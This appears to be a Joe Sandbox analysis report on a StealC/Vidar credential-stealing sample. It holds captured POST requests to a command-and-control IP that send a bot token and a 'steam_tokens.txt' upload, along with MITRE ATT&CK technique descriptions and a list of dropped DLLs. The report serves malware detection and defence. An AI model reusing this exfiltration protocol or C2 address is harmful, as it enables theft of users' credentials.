Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIJKKFHIEGCBGCAFIJHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 61 38 39 35 32 31 36 62 30 37 34 32 64 37 35 32 64 65 36 33 35 37 31 32 64 64 35 33 34 65 33 37 61 36 33 38 62 66 64 30 65 38 30 35 63 61 34 32 30 66 37 63 31 39 36 38 65 31 34 35 61 34 31 37 37 39 32 39 31 32 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="token"31a895216b0742d752de635712dd534e37a638bfd0e805ca420f7c1968e145a417792912------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="file"------AEHIJKKFHIEGCBGCAFIJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHIEGIIIECAKEBFBAAHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 61 38 39 35 32 31 36 62 30 37 34 32 64 37 35 32 64 65 36 33 35 37 31 32 64 64 35 33 34 65 33 37 61 36 33 38 62 66 64 30 65 38 30 35 63 61 34 32 30 66 37 63 31 39 36 38 65 31 34 35 61 34 31 37 37 39 32 39 31 32 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 2d 2d 0d 0a Data Ascii: ------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="token"31a895216b0742d752de635712dd534e37a638bfd0e805ca420f7c1968e145a417792912------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="message"files------HIDHIEGIIIECAKEBFBAA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHJKFHJJJKJJJJKEHCBHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 61 38 39 35 32 31 36 62 30 37 34 32 64 37 35 32 64 65 36 33 35 37 31 32 64 64 35 33 34 65 33 37 61 36 33 38 62 66 64 30 65 38 30 35 63 61 34 32 30 66 37 63 31 39 36 38 65 31 34 35 61 34 31 37 37 39 32 39 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 2d 2d 0d 0a Data Ascii: ------EGHJKFHJJJKJJJJKEHCBContent-Disposition: form-data; name="token"31a895216b0742d752de635712dd534e37a638bfd0e805ca420f7c1968e145a417792912------EGHJKFHJJJKJJJJKEHCBContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EGHJKFHJJJKJJJJKEHCB--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\CAFHDBGHJKFIDHJJJEBK

C:\ProgramData\CBAKEBGIIDAFIDHIIECF

C:\ProgramData\GDBFCGIIIJDBGCBGIDGI

C:\ProgramData\IIIJECAEGDHIDHJKKKKFIEGIJK

C:\ProgramData\IJJJEBFH

C:\ProgramData\IJJJEBFHDBGIECBFCBKJKKJDHJ

C:\ProgramData\KJKKKJJJ

C:\ProgramData\KJKKKJJJKJKFHJJJJECBFCGHJD

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

Windows Analysis Report
file.exe

Function 00109860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 000F45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 000FBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 00104910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 000F4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Function 00109C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 000F7710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Function 00100250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Function 000F5100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Function 000FA790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre